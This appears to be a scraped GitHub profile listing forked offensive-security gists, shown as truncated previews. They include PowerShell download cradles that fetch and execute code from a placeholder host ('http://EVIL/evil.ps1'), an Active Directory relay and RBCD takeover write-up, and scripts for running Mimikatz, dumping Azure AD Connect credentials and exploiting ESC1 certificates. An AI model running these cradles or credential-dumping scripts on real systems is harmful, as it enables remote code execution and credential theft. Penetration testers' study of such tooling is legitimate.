### Keybase proof
I hereby claim:
* I am d4rkz3ro on github.
* I am sageyev on keybase.
* I have a public key ASDnFT5MR4aJjCgaAVnamCtGsr0hwBiHFyUmTWyxqeDaZgo
To claim this, I am signing this object:
D4rkz3rO / DownloadCradles.ps1
Created July 19, 2021 19:10 — forked from HarmJ0y/DownloadCradles.ps1
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
D4rkz3rO /
Created July 26, 2021 02:50 — forked from gladiatx0r/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

D4rkz3rO /
Created September 24, 2021 15:41 — forked from seajaysec/
Parses output from CrackMapExec, CrackMapExtreme, Responder, PCredz, and into aggregate files of hashes and plaintext output
# This script assumes Responder is in /opt/Responder
# Error messages begone!
exec 2>/dev/null
# Hardcoded location for script output files
# Hardcoded location for ntlmrelayx's .sam file output directory
D4rkz3rO / skullkatz.cs
Created September 1, 2021 19:48
SkullKatz - Execute Mimikatz from an image
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
D4rkz3rO / azuread_decrypt_msol_v2.ps1
Created January 10, 2023 05:41 — forked from xpn/azuread_decrypt_msol_v2.ps1
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
try {
} catch {
Write-Host "[!] Could not connect to localdb..."
Setup transparent proxy with VMware Fusion

  1. Add network (vmnet3) to VMware Fusion
    1. sudo vi /Library/Preferences/VMware\ Fusion/networking
       answer VNET_1_HOSTONLY_SUBNET
       answer VNET_1_VIRTUAL_ADAPTER yes
      +answer VNET_3_DHCP yes
      +answer VNET_3_DHCP_PARAM_DNS_ADDR
D4rkz3rO /
Created February 10, 2023 05:11 — forked from koenrh/
This is a little guide that helps you to "proxify" a VMware Fusion virtual machine on macOS. This can be useful if you want to isolate and analyse web traffic to/from an application by running it in a VM.

Proxifying a VMware Fusion virtual machine on macOS

  • VMware Fusion 11 Pro
  • Transparent HTTP/HTTPS proxy (e.g. Burp Suite Pro or mitmproxy)
D4rkz3rO / esc1.ps1
Created February 24, 2023 06:07 — forked from b4cktr4ck2/esc1.ps1
PowerShell script to exploit ESC1/retrieve your own NTLM password hash.
#Thank you @NotMedic for troubleshooting/validating stuff!
$password = Read-Host -Prompt "Enter Password"
#^^ Feel free to hardcode this for running in a beacon/not retyping it all the time!
$server = "admin" #This will just decide the name of the cert request files that are created. I didn't want to change the var name so it's server for now.
$CERTPATH = "C:\Users\lowpriv\Desktop\" #Where do you want the cert requests to be stored?
$CAFQDN = "dc01.alexlab.local" #hostname of underlying CA box.
$CASERVER = "alexlab-dc01-ca" #CA name.
D4rkz3rO /
Created April 14, 2023 14:42 — forked from gladiatx0r/
A cheatsheet with commands that can be used to perform kerberos attacks